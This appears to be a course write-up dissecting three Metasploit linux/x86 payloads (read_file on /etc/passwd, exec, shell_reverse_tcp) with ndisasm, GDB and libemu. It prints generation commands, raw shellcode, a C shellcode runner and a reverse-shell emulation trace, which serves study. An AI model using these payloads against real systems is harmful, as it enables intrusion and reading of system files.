Assignment
- Take up at least 3 shellcode samples created using Msfpayload for linux/x86
- Use GDB/Ndisasm/Libemu to dissect the functionality of the shellcode
- Present your analysis
Shellcode – linux/x86/read_file (Ndisasm)
Starting simple, we chose the read_file payload from msfvenom. A quick look at the options shows that the file descriptor defaults to 1, which is STDOUT, so we only need to supply the PATH variable to generate our shellcode.
```text
suls@kali:~/slae/Assignment-5$ msfvenom -p linux/x86/read_file --list-options
Options for payload/linux/x86/read_file:
=========================

       Name: Linux Read File
     Module: payload/linux/x86/read_file
   Platform: Linux
       Arch: x86
Needs Admin: No
 Total size: 62
       Rank: Normal

Provided by:
  hal

Basic options:
Name  Current Setting  Required  Description
----  ---------------  --------  -----------
FD    1                yes       The file descriptor to write output to
PATH                   yes       The file path to read

Description:
  Read up to 4096 bytes from the local file system and write it back out to
  the specified file descriptor
```
We generate our shellcode with the command seen below.
```shell
msfvenom -p linux/x86/read_file PATH=/etc/passwd -f raw -o read_file_shellcode
```
Then we disassemble the shellcode using Ndisasm:

```shell
cat read_file_shellcode | ndisasm -u -
```
An inline analysis of the shellcode is provided below. At a high level, the following syscalls are made, in order, to open the file, read it and write it to STDOUT:
- open("/etc/passwd", 0)
- read(int fd, void *buf, 4096)
- write(int fd, const void *buf, size_t count)
- exit(0)
```text
00000000  EB36              jmp short 0x38       # Jump to 00000038, which calls 0x2 (JMP-CALL-POP technique);
                                                 # the call pushes the address of the file path at 0000003D
00000002  B805000000        mov eax,0x5          # Syscall 5 = open
00000007  5B                pop ebx              # Pop the file path address (0000003D) into EBX
00000008  31C9              xor ecx,ecx          # Zero ECX = flags (0 = O_RDONLY)
0000000A  CD80              int 0x80             # Syscall open(const char *pathname, int flags)
0000000C  89C3              mov ebx,eax          # Move the file descriptor returned in EAX by open to EBX
0000000E  B803000000        mov eax,0x3          # Syscall 3 = read
00000013  89E7              mov edi,esp
00000015  89F9              mov ecx,edi          # Point ECX at the top of the stack = buffer for the bytes read
00000017  BA00100000        mov edx,0x1000       # 4096 = number of bytes to read
0000001C  CD80              int 0x80             # Syscall read(int fd, void *buf, size_t count)
0000001E  89C2              mov edx,eax          # Store the number of bytes read in EDX
00000020  B804000000        mov eax,0x4          # Syscall 4 = write
00000025  BB01000000        mov ebx,0x1          # File descriptor 1 = STDOUT
0000002A  CD80              int 0x80             # Syscall write(int fd, const void *buf, size_t count)
0000002C  B801000000        mov eax,0x1          # Syscall 1 = exit
00000031  BB00000000        mov ebx,0x0          # Return code 0
00000036  CD80              int 0x80             # Syscall exit: clean exit
00000038  E8C5FFFFFF        call 0x2             # Call 0x2, the call half of the JMP-CALL-POP sequence
0000003D  2F                das                  # The remaining bytes are the file path /etc/passwd,
0000003E  657463            gs jz 0xa4           # which ndisasm renders as meaningless instructions
00000041  2F                das
00000042  7061              jo 0xa5
00000044  7373              jnc 0xb9
00000046  7764              ja 0xac
00000048  00                db 0x00              # NUL terminator of the path
```
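The manual method used above (find each `int 0x80`, then look back for the last value loaded into EAX and the argument registers) can be automated for a static listing. The following Python script is an added example, not part of the original post or of msfvenom: it walks an ndisasm listing top to bottom, tracks which registers hold constants, and labels each `int 0x80` with the i386 syscall name. The two listings embedded in it are constructed from the page's own disassembly (the read_file payload above and the opening of the shell_reverse_tcp payload analysed later); the second one exercises the `mul`, `mov al` and `xchg` idioms that Metasploit uses to keep the syscall number out of a plain `mov eax,imm`.

```python
import re

# i386 syscall numbers used by the three samples (from <asm/unistd_32.h>)
SYSCALLS = {1: "exit", 3: "read", 4: "write", 5: "open", 11: "execve",
            63: "dup2", 102: "socketcall"}
ARGS = ("ebx", "ecx", "edx")                 # first three int 0x80 arguments
LOW8 = {"al": "eax", "bl": "ebx", "cl": "ecx", "dl": "edx"}

# Constructed input: the read_file listing from the page with the comments stripped.
READ_FILE_LISTING = """
00000000  EB36              jmp short 0x38
00000002  B805000000        mov eax,0x5
00000007  5B                pop ebx
00000008  31C9              xor ecx,ecx
0000000A  CD80              int 0x80
0000000C  89C3              mov ebx,eax
0000000E  B803000000        mov eax,0x3
00000013  89E7              mov edi,esp
00000015  89F9              mov ecx,edi
00000017  BA00100000        mov edx,0x1000
0000001C  CD80              int 0x80
0000001E  89C2              mov edx,eax
00000020  B804000000        mov eax,0x4
00000025  BB01000000        mov ebx,0x1
0000002A  CD80              int 0x80
0000002C  B801000000        mov eax,0x1
00000031  BB00000000        mov ebx,0x0
00000036  CD80              int 0x80
"""

# Constructed input: the opening of shell_reverse_tcp (socket + first dup2),
# rebuilt in ndisasm form from the libemu trace on the page.
REVERSE_TCP_PREFIX = """
00000000  31DB              xor ebx,ebx
00000002  F7E3              mul ebx
00000004  53                push ebx
00000005  43                inc ebx
00000006  53                push ebx
00000007  6A02              push byte 0x2
00000009  89E1              mov ecx,esp
0000000B  B066              mov al,0x66
0000000D  CD80              int 0x80
0000000F  93                xchg eax,ebx
00000010  59                pop ecx
00000011  B03F              mov al,0x3f
00000013  CD80              int 0x80
"""

def value_of(operand, regs):
    """Resolve an operand to a known constant, or None if not statically known."""
    operand = operand.replace("byte ", "").replace("dword ", "")
    if operand in regs:
        return regs[operand]
    try:
        return int(operand, 0)
    except ValueError:
        return None                          # memory operand or untracked register

def assign(regs, dst, value):
    """Record a register write; None forgets the register. 8-bit writes patch the low byte."""
    full = LOW8.get(dst, dst)
    if value is None or (dst in LOW8 and full not in regs):
        regs.pop(full, None)
    elif dst in LOW8:
        regs[full] = (regs[full] & ~0xFF) | (value & 0xFF)
    else:
        regs[full] = value & 0xFFFFFFFF

def annotate_syscalls(listing):
    """Walk an ndisasm listing top to bottom (branches are not followed), tracking
    constant register values; return (address, syscall name, args) per int 0x80."""
    regs, calls = {}, []
    for line in listing.strip().splitlines():
        m = re.match(r"([0-9A-Fa-f]+)\s+[0-9A-Fa-f]+\s+(\S+)\s*(.*)$", line.strip())
        if not m:
            continue
        addr, op, ops = int(m.group(1), 16), m.group(2), m.group(3)
        args = [a.strip() for a in ops.split(",")] if ops else []
        if op == "int" and args == ["0x80"]:
            num = regs.get("eax")
            name = SYSCALLS.get(num, "unknown" if num is None else f"syscall_{num}")
            calls.append((addr, name, {r: regs.get(r) for r in ARGS}))
            assign(regs, "eax", None)        # the return value depends on the runtime
        elif op == "mov":
            assign(regs, args[0], value_of(args[1], regs))
        elif op == "xor" and args[0] == args[1]:
            assign(regs, args[0], 0)
        elif op == "pop":
            assign(regs, args[0], None)
        elif op in ("inc", "dec") and args[0] in regs:
            assign(regs, args[0], regs[args[0]] + (1 if op == "inc" else -1))
        elif op == "xchg":
            a, b = regs.get(args[0]), regs.get(args[1])
            assign(regs, args[0], b)
            assign(regs, args[1], a)
        elif op == "mul":                    # mul r32: edx:eax = eax * r32
            zero = regs.get(args[0]) == 0 or regs.get("eax") == 0
            assign(regs, "eax", 0 if zero else None)
            assign(regs, "edx", 0 if zero else None)
    return calls

if __name__ == "__main__":
    for addr, name, args in annotate_syscalls(READ_FILE_LISTING):
        print(f"{addr:08x}  {name:<10} " + "  ".join(
            f"{r}={'?' if v is None else hex(v)}" for r, v in args.items()))
```

Arguments that come from `pop` or from a previous syscall's return value are reported as unknown, which is exactly the point at which the static view has to be replaced by GDB or libemu, as the next two sections do.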
Shellcode – linux/x86/exec (GDB)
For our second shellcode we review the Metasploit linux/x86/exec payload with GDB. First we generate the shellcode with msfvenom:
```text
msfvenom -p linux/x86/exec -f c CMD=whoami
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 42 bytes
Final size of c file: 201 bytes
unsigned char buf[] = 
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
"\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x07\x00\x00\x00\x77"
"\x68\x6f\x61\x6d\x69\x00\x57\x53\x89\xe1\xcd\x80";
```
We paste this into our shellcode.c program in order to compile and execute the code:
```c
#include <stdio.h>
#include <string.h>

/* linux/x86/exec CMD=whoami payload as emitted by msfvenom -f c */
unsigned char code[] = \
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
"\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x07\x00\x00\x00\x77"
"\x68\x6f\x61\x6d\x69\x00\x57\x53\x89\xe1\xcd\x80";

int main()
{
    /* Cast the buffer to a function pointer and jump into it. The binary has
       to be built with an executable data segment (e.g. -z execstack), or
       the jump faults before the first instruction runs. */
    int (*ret)() = (int(*)())code;
    ret();
}
```
We then compile and test:
Next we run it under GDB, break on the code buffer and disassemble it:

```text
gdb ./shellcode_GDB
(gdb) break *&code
(gdb) set disassembly-flavor intel
(gdb) run
Breakpoint 1, 0x0804a040 in code ()
(gdb) disassemble
Dump of assembler code for function code:
=> 0x0804a040 <+0>:     push   0xb
   0x0804a042 <+2>:     pop    eax
   0x0804a043 <+3>:     cdq
   0x0804a044 <+4>:     push   edx
   0x0804a045 <+5>:     pushw  0x632d
   0x0804a049 <+9>:     mov    edi,esp
   0x0804a04b <+11>:    push   0x68732f
   0x0804a050 <+16>:    push   0x6e69622f
   0x0804a055 <+21>:    mov    ebx,esp
   0x0804a057 <+23>:    push   edx
   0x0804a058 <+24>:    call   0x804a064 <code+36>
   0x0804a05d <+29>:    ja     0x804a0c7
   0x0804a05f <+31>:    outs   dx,DWORD PTR ds:[esi]
   0x0804a060 <+32>:    popa
   0x0804a061 <+33>:    ins    DWORD PTR es:[edi],dx
   0x0804a062 <+34>:    imul   eax,DWORD PTR [eax],0xe1895357
   0x0804a068 <+40>:    int    0x80
   0x0804a06a <+42>:    add    BYTE PTR [eax],al
End of assembler dump.
```
The bytes from <+29> to <+34> are not real code: the `call` at <+24> jumps over the string "whoami\0" that follows it, leaving the string's address on the stack as the return address, and GDB's linear disassembly renders those bytes as nonsense instructions. Of interest is the syscall at 0x0804a068, so we set a breakpoint there with:

```text
(gdb) break *0x0804a068
(gdb) continue
```
Reviewing the registers we find the following:
```text
(gdb) info registers
eax            0xb      11
ecx            0xbfffee2e       -1073746386
edx            0x0      0
ebx            0xbfffee3e       -1073746370
esp            0xbfffee2e       0xbfffee2e
ebp            0xbfffee68       0xbfffee68
esi            0xb7fba000       -1208246272
edi            0xbfffee46       -1073746362
eip            0x804a068        0x804a068 <code+40>
eflags         0x286    [ PF SF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
```
EAX is 11, which indicates that the execve syscall is being made. The execve man page details the parameters passed in EBX, ECX and EDX.
![](https://www.suls.co.uk/wp-content/uploads/2021/06/image-2-1024x491.png)
Examining the memory at 0xbfffee3e (EBX) we can see the first argument is /bin/sh:

```text
(gdb) x/1s 0xbfffee3e
0xbfffee3e:     "/bin/sh"
```
I was struggling to work out the string array at ECX via GDB alone, so I installed the PEDA extension to make things a little clearer. Using PEDA we can see the array of arguments passed to the syscall on the stack at 0xbfffee2e: "/bin/sh", "-c" and "whoami" respectively:
![](https://www.suls.co.uk/wp-content/uploads/2021/06/image-3.png)
Finally, EDX is 0x0 for the envp argument, which concludes our analysis; the resulting call is:

```text
execve("/bin/sh", ["/bin/sh", "-c", "whoami"], 0)
```
Shellcode – linux/x86/shell_reverse_tcp (libemu)
For our final shellcode we analyse the Metasploit linux/x86/shell_reverse_tcp payload with libemu. We generate the shellcode to a raw file with the following command:

```shell
msfvenom -p linux/x86/shell_reverse_tcp RPORT=4444 RHOST=192.168.1.1 -o shell-reverse-tcp
```
We used the following guide to install libemu in our Ubuntu VM, https://www.doyler.net/security-not-included/libemu-installation, and then analysed the shellcode with the following command:

```shell
cat shell-reverse-tcp | sctest -vvv -Ss 100000 verbose=3
```
This provides us with the following breakdown of the code:
```text
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417000
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000
[emu 0x0x85b7480 debug ] esp=0x00416fce  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags:
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417000
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000
[emu 0x0x85b7480 debug ] esp=0x00416fce  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags:
[emu 0x0x85b7480 debug ] 31DB                            xor ebx,ebx
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417002
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000
[emu 0x0x85b7480 debug ] esp=0x00416fce  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF ZF
[emu 0x0x85b7480 debug ] F7E3                            mul ebx
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417004
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000
[emu 0x0x85b7480 debug ] esp=0x00416fce  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF ZF
[emu 0x0x85b7480 debug ] 53                              push ebx
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417005
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000
[emu 0x0x85b7480 debug ] esp=0x00416fca  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF ZF
[emu 0x0x85b7480 debug ] 43                              inc ebx
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417006
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000001
[emu 0x0x85b7480 debug ] esp=0x00416fca  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags:
[emu 0x0x85b7480 debug ] 53                              push ebx
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417007
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000001
[emu 0x0x85b7480 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags:
[emu 0x0x85b7480 debug ] 6A02                            push byte 0x2
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417009
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000001
[emu 0x0x85b7480 debug ] esp=0x00416fc2  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags:
[emu 0x0x85b7480 debug ] 89E1                            mov ecx,esp
[emu 0x0x85b7480 debug ] cpu state    eip=0x0041700b
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00416fc2  edx=0x00000000  ebx=0x00000001
[emu 0x0x85b7480 debug ] esp=0x00416fc2  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags:
[emu 0x0x85b7480 debug ] B066                            mov al,0x66
[emu 0x0x85b7480 debug ] cpu state    eip=0x0041700d
[emu 0x0x85b7480 debug ] eax=0x00000066  ecx=0x00416fc2  edx=0x00000000  ebx=0x00000001
[emu 0x0x85b7480 debug ] esp=0x00416fc2  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags:
[emu 0x0x85b7480 debug ] CD80                            int 0x80
int socket(int domain=2, int type=1, int protocol=0);
[emu 0x0x85b7480 debug ] cpu state    eip=0x0041700f
[emu 0x0x85b7480 debug ] eax=0x0000000e  ecx=0x00416fc2  edx=0x00000000  ebx=0x00000001
[emu 0x0x85b7480 debug ] esp=0x00416fc2  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags:
[emu 0x0x85b7480 debug ] 93                              xchg eax,ebx
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417010
[emu 0x0x85b7480 debug ] eax=0x00000001  ecx=0x00416fc2  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fc2  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags:
[emu 0x0x85b7480 debug ] 59                              pop ecx
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417011
[emu 0x0x85b7480 debug ] eax=0x00000001  ecx=0x00000002  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags:
[emu 0x0x85b7480 debug ] B03F                            mov al,0x3f
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417013
[emu 0x0x85b7480 debug ] eax=0x0000003f  ecx=0x00000002  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags:
[emu 0x0x85b7480 debug ] CD80                            int 0x80
int dup2(int oldfd=14, int newfd=2);
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417015
[emu 0x0x85b7480 debug ] eax=0x00000002  ecx=0x00000002  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags:
[emu 0x0x85b7480 debug ] 49                              dec ecx
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417016
[emu 0x0x85b7480 debug ] eax=0x00000002  ecx=0x00000001  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags:
[emu 0x0x85b7480 debug ] 79F9                            jns 0xfffffffb
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417011
[emu 0x0x85b7480 debug ] eax=0x00000002  ecx=0x00000001  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags:
[emu 0x0x85b7480 debug ] B03F                            mov al,0x3f
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417013
[emu 0x0x85b7480 debug ] eax=0x0000003f  ecx=0x00000001  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags:
[emu 0x0x85b7480 debug ] CD80                            int 0x80
int dup2(int oldfd=14, int newfd=1);
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417015
[emu 0x0x85b7480 debug ] eax=0x00000001  ecx=0x00000001  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags:
[emu 0x0x85b7480 debug ] 49                              dec ecx
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417016
[emu 0x0x85b7480 debug ] eax=0x00000001  ecx=0x00000000  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF ZF
[emu 0x0x85b7480 debug ] 79F9                            jns 0xfffffffb
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417011
[emu 0x0x85b7480 debug ] eax=0x00000001  ecx=0x00000000  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF ZF
[emu 0x0x85b7480 debug ] B03F                            mov al,0x3f
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417013
[emu 0x0x85b7480 debug ] eax=0x0000003f  ecx=0x00000000  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF ZF
[emu 0x0x85b7480 debug ] CD80                            int 0x80
int dup2(int oldfd=14, int newfd=0);
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417015
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF ZF
[emu 0x0x85b7480 debug ] 49                              dec ecx
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417016
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0xffffffff  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF
[emu 0x0x85b7480 debug ] 79F9                            jns 0xfffffffb
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417018
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0xffffffff  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF
[emu 0x0x85b7480 debug ] 68C0A80185                      push dword 0x8501a8c0
[emu 0x0x85b7480 debug ] cpu state    eip=0x0041701d
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0xffffffff  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fc2  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF
[emu 0x0x85b7480 debug ] 680200115C                      push dword 0x5c110002
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417022
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0xffffffff  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fbe  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF
[emu 0x0x85b7480 debug ] 89E1                            mov ecx,esp
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417024
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00416fbe  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fbe  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF
[emu 0x0x85b7480 debug ] B066                            mov al,0x66
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417026
[emu 0x0x85b7480 debug ] eax=0x00000066  ecx=0x00416fbe  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fbe  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF
[emu 0x0x85b7480 debug ] 50                              push eax
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417027
[emu 0x0x85b7480 debug ] eax=0x00000066  ecx=0x00416fbe  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fba  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF
[emu 0x0x85b7480 debug ] 51                              push ecx
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417028
[emu 0x0x85b7480 debug ] eax=0x00000066  ecx=0x00416fbe  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fb6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF
[emu 0x0x85b7480 debug ] 53                              push ebx
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417029
[emu 0x0x85b7480 debug ] eax=0x00000066  ecx=0x00416fbe  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fb2  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF
[emu 0x0x85b7480 debug ] B303                            mov bl,0x3
[emu 0x0x85b7480 debug ] cpu state    eip=0x0041702b
[emu 0x0x85b7480 debug ] eax=0x00000066  ecx=0x00416fbe  edx=0x00000000  ebx=0x00000003
[emu 0x0x85b7480 debug ] esp=0x00416fb2  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF
[emu 0x0x85b7480 debug ] 89E1                            mov ecx,esp
[emu 0x0x85b7480 debug ] cpu state    eip=0x0041702d
[emu 0x0x85b7480 debug ] eax=0x00000066  ecx=0x00416fb2  edx=0x00000000  ebx=0x00000003
[emu 0x0x85b7480 debug ] esp=0x00416fb2  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF
[emu 0x0x85b7480 debug ] CD80                            int 0x80
connect
[emu 0x0x85b7480 debug ] cpu state    eip=0x0041702f
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00416fb2  edx=0x00000000  ebx=0x00000003
[emu 0x0x85b7480 debug ] esp=0x00416fb2  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF
[emu 0x0x85b7480 debug ] 52                              push edx
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417030
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00416fb2  edx=0x00000000  ebx=0x00000003
[emu 0x0x85b7480 debug ] esp=0x00416fae  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF
[emu 0x0x85b7480 debug ] 686E2F7368                      push dword 0x68732f6e
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417035
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00416fb2  edx=0x00000000  ebx=0x00000003
[emu 0x0x85b7480 debug ] esp=0x00416faa  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF
[emu 0x0x85b7480 debug ] 682F2F6269                      push dword 0x69622f2f
[emu 0x0x85b7480 debug ] cpu state    eip=0x0041703a
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00416fb2  edx=0x00000000  ebx=0x00000003
[emu 0x0x85b7480 debug ] esp=0x00416fa6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF
[emu 0x0x85b7480 debug ] 89E3                            mov ebx,esp
[emu 0x0x85b7480 debug ] cpu state    eip=0x0041703c
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00416fb2  edx=0x00000000  ebx=0x00416fa6
[emu 0x0x85b7480 debug ] esp=0x00416fa6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF
[emu 0x0x85b7480 debug ] 52                              push edx
[emu 0x0x85b7480 debug ] cpu state    eip=0x0041703d
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00416fb2  edx=0x00000000  ebx=0x00416fa6
[emu 0x0x85b7480 debug ] esp=0x00416fa2  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF
[emu 0x0x85b7480 debug ] 53                              push ebx
[emu 0x0x85b7480 debug ] cpu state    eip=0x0041703e
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00416fb2  edx=0x00000000  ebx=0x00416fa6
[emu 0x0x85b7480 debug ] esp=0x00416f9e  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF
[emu 0x0x85b7480 debug ] 89E1                            mov ecx,esp
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417040
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00416f9e  edx=0x00000000  ebx=0x00416fa6
[emu 0x0x85b7480 debug ] esp=0x00416f9e  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF
[emu 0x0x85b7480 debug ] B00B                            mov al,0xb
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417042
[emu 0x0x85b7480 debug ] eax=0x0000000b  ecx=0x00416f9e  edx=0x00000000  ebx=0x00416fa6
[emu 0x0x85b7480 debug ] esp=0x00416f9e  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF
[emu 0x0x85b7480 debug ] CD80                            int 0x80
execve
int execve (const char *dateiname=00416fa6={//bin/sh}, const char * argv[], const char *envp[]);
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417044
[emu 0x0x85b7480 debug ] eax=0x0000000b  ecx=0x00416f9e  edx=0x00000000  ebx=0x00416fa6
[emu 0x0x85b7480 debug ] esp=0x00416f9e  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF
[emu 0x0x85b7480 debug ] 0000                            add [eax],al
cpu error error accessing 0x00000004 not mapped

stepcount 42
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417046
[emu 0x0x85b7480 debug ] eax=0x0000000b  ecx=0x00416f9e  edx=0x00000000  ebx=0x00416fa6
[emu 0x0x85b7480 debug ] esp=0x00416f9e  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF
